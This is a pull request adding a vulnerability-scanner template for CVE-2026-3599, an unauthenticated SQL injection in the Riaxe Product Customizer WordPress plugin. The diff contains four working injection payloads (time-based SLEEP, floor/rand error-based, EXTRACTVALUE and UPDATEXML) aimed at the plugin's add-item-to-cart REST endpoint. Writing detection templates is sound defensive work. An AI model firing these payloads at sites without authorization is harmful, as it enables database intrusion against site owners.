### PR TITLE
[New Template] CVE-2026-3599: Riaxe Product Customizer SQL Injection

### DIFF
--- a/http/technologies/wordpress/CVE-2026-3599.yaml
+++ b/http/technologies/wordpress/CVE-2026-3599.yaml
@@ -1,0 +1,151 @@
+id: CVE-2026-3599
+
+info:
+  name: Riaxe Product Customizer - SQL Injection
+  author: security-researcher
+  severity: high
+  description: |
+    Unauthenticated SQL Injection vulnerability in Riaxe Product Customizer plugin for WordPress.
+    The vulnerability exists in the 'add-item-to-cart' REST API endpoint where user-supplied keys
+    within the 'options' parameter of 'product_data' are not properly sanitized before being used
+    in SQL queries. This affects all versions up to and including 2.1.2.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-3599
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/riaxe-product-customizer
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-3599
+    cwe-id: CWE-89
+  tags: wordpress,wp-plugin,sqli,unauth,cve,cve2026,rest-api
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-json/InkXEProductDesignerLite/add-item-to-cart"
+    
+    headers:
+      Content-Type: application/json
+    
+    body: |
+      {
+        "product_data": {
+          "product_id": 1,
+          "options": {
+            "' OR SLEEP(5)-- -": "test"
+          }
+        }
+      }
+    
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=5'
+        name: time-based-sqli
+      
+      - type: status
+        status:
+          - 200
+          - 500
+          - 400
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-json/InkXEProductDesignerLite/add-item-to-cart"
+    
+    headers:
+      Content-Type: application/json
+    
+    body: |
+      {
+        "product_data": {
+          "product_id": 1,
+          "options": {
+            "1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT version()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -": "test"
+          }
+        }
+      }
+    
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Duplicate entry"
+          - "for key"
+          - "SQL"
+          - "syntax"
+          - "mysql"
+          - "MariaDB"
+        condition: or
+        part: body
+      
+      - type: status
+        status:
+          - 200
+          - 500
+          - 400
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-json/InkXEProductDesignerLite/add-item-to-cart"
+    
+    headers:
+      Content-Type: application/json
+    
+    body: |
+      {
+        "product_data": {
+          "product_id": 1,
+          "options": {
+            "1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))-- -": "test"
+          }
+        }
+      }
+    
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "~[0-9]+\.[0-9]+\.[0-9]+~"
+          - "XPATH syntax error"
+        condition: or
+        part: body
+      
+      - type: status
+        status:
+          - 200
+          - 500
+          - 400
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-json/InkXEProductDesignerLite/add-item-to-cart"
+    
+    headers:
+      Content-Type: application/json
+    
+    body: |
+      {
+        "product_data": {
+          "product_id": 1,
+          "options": {
+            "1' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version()),0x7e),1)-- -": "test"
+          }
+        }
+      }
+    
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "~[0-9]+\.[0-9]+\.[0-9]+~"
+          - "XPATH syntax error"
+        condition: or
+        part: body
+      
+      - type: status
+        status:
+          - 200
+          - 500
+          - 400


### PR DESCRIPTION
## Template Information

**CVE ID:** CVE-2026-3599
**CVSS Score:** 7.5 (High)
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
**CWE:** CWE-89 (SQL Injection)

## Vulnerability Description

Unauthenticated SQL Injection vulnerability in Riaxe Product Customizer plugin for WordPress. The vulnerability exists in the 'add-item-to-cart' REST API endpoint where user-supplied keys within the 'options' parameter of 'product_data' are not properly sanitized before being used in SQL queries.

## Affected Software

- **Plugin:** Riaxe Product Customizer
- **Affected Versions:** <= 2.1.2

## References

- https://nvd.nist.gov/vuln/detail/CVE-2026-3599
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/riaxe-product-customizer